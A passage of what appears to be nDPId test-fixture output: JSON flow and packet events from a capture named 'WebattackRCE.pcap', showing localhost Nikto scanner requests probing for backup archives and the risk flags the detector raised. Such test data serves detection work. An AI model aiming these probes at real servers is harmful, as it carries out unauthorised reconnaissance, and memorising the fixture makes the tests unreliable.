Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1576420276885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276885,"pkt":"AAAAAAAAAAAAAAAACABFAADFQQ5AAEAG+yJ\/AAABfwAAAcKeH5AdhXlKg0oevYAYAED+uQAAAQEICp1m+72dZvu9R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1576420276886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276886,"pkt":"AAAAAAAAAAAAAAAACABFAADFWJBAAEAG46B\/AAABfwAAAcKgH5CSJ2DMWYYFgIAYAED+uQAAAQEICp1m+76dZvu+R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1576420276888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276888,"pkt":"AAAAAAAAAAAAAAAACABFAAC95a1AAEAGVot\/AAABfwAAAcKiH5DfWN3u+DsBkYAYAED+sQAAAQEICp1m+8CdZvvAR0VUIC8wLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1576420276890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276890,"pkt":"AAAAAAAAAAAAAAAACABFAAC9vy5AAEAGfQp\/AAABfwAAAcKkH5Dme4drk\/tL44AYAED+sQAAAQEICp1m+8KdZvvCR0VUIC8wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1576420276891,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276891,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/ZdAAEAGPpl\/AAABfwAAAcKmH5DYD8XTrc+7CoAYAED+uQAAAQEICp1m+8OdZvvDR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1576420276893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276893,"pkt":"AAAAAAAAAAAAAAAACABFAADFI6xAAEAGGIV\/AAABfwAAAcKoH5Ar0hvuzfCq7oAYAED+uQAAAQEICp1m+8WdZvvFR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1576420276894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276894,"pkt":"AAAAAAAAAAAAAAAACABFAADDA5ZAAEAGOJ1\/AAABfwAAAcKqH5B\/mzvUPuYs44AYAED+twAAAQEICp1m+8adZvvGR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1576420276896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276896,"pkt":"AAAAAAAAAAAAAAAACABFAADD\/SZAAEAGPwx\/AAABfwAAAcKsH5AB18VtW5jVeIAYAED+twAAAQEICp1m+8idZvvIR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1576420276897,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276897,"pkt":"AAAAAAAAAAAAAAAACABFAADFBrJAAEAGNX9\/AAABfwAAAcKuH5Ayaz75EQ6Mk4AYAED+uQAAAQEICp1m+8mdZvvJR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1576420276900,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276900,"pkt":"AAAAAAAAAAAAAAAACABFAADFczBAAEAGyQB\/AAABfwAAAcKwH5A3G0tor3ywHoAYAED+uQAAAQEICp1m+8ydZvvMR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1576420276901,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276901,"pkt":"AAAAAAAAAAAAAAAACABFAADD0l1AAEAGadV\/AAABfwAAAcKyH5CdU+oT47LjtYAYAED+twAAAQEICp1m+82dZvvNR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on 